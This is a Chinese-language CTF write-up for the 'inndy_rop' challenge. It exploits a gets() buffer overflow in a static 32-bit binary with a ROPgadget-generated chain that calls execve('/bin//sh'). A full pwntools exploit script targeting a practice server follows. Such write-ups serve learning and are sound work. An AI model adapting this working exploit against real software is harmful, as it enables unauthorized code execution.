inndy_rop

文章发布时间:

最后更新时间:

文章总字数:
1.1k

预计阅读时间:
6 分钟

这一题以前没遇到过 算是蛮新奇的 所以记录下来 还学到了ROPgadget的新用法

1
2
3
4
5
6
[*] '/home/chen/pwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

32位 没有开启pie和canary

ida打开后发现只有一个简单的gets溢出的机会

1
2
3
4
5
6
int overflow()
{
  char v1[12]; // [esp+Ch] [ebp-Ch] BYREF

  return gets(v1);
}

并且这题是静态编译 ida打开会出现一大堆乱七八糟的函数 静态编译没有调用libc函数 所以这题也就不存在泄露libc然后获取system函数地址 进行系统调用的做法了

那么这时候 就需要用到ROPgadget其一个功能 自动生成一串rop链

1
ROPgadget --binary file_name --ropchain
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
# Padding goes here
p = b''

p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80

他已经自动帮我们生成好脚本了 我们只需要手动加上偏移 就可以pwn成功

但是这里需要注意 你需要添加一个库 如果没有这个库 脚本会报错

1
2
3
4
5
6
Traceback (most recent call last):
  File "/home/chen/exp.py", line 51, in <module>
    p += pack('<I', 0x0806ecda) # pop edx ; ret
  File "/home/chen/.local/lib/python3.6/site-packages/pwnlib/util/packing.py", line 102, in pack
    if sign is None and number < 0:
TypeError: '<' not supported between instances of 'str' and 'int'

库:

1
from struct import pack

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
from pwn import*
from struct import pack

def libcmath(function_addr,function_name):
    libc_addr = function_addr - libc.sym[function_name]
    system_addr = libc_addr + libc.sym['system']
    binsh_addr = libc_addr + next(libc.search(b"/bin/sh"))
    return system_addr,binsh_addr

def csu(offset,gadget2_addr,call_addr,rdx,rsi,rdi,gadget1_addr,ret_addr):
    payload = cyclic(offset)
    payload += p64(gadget2_addr)
    payload += cyclic(0x8)
    payload += p64(0)
    payload += p64(1)
    payload += p64(call_addr)
    payload += p64(rdx)
    payload += p64(rsi)
    payload += p64(rdi)
    payload += p64(gadget1_addr)
    payload += cyclic(56)
    payload += p64(ret_addr)
    return payload

def localconnect(filename):
    io = process(filename)
    return io

def remoteconnect(ip,port):
    io = remote(ip,port)
    return io

def elf_libc(filename,libc_name):
    elf = ELF(filename)
    libc = ELF(libc_name)
    return elf,libc

def debug(button):
    if(button==1):
        context.log_level = "debug"

filename = 'pwn'
libc_name = 'buu_libc_ubuntu16_32'
ip="node4.buuoj.cn"
port=27246
elf,libc = elf_libc(filename,libc_name)


io = remoteconnect(ip,port)
debug(1)
p = b'a' * (0xc+0x4)
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80
io.sendline(p)
io.interactive()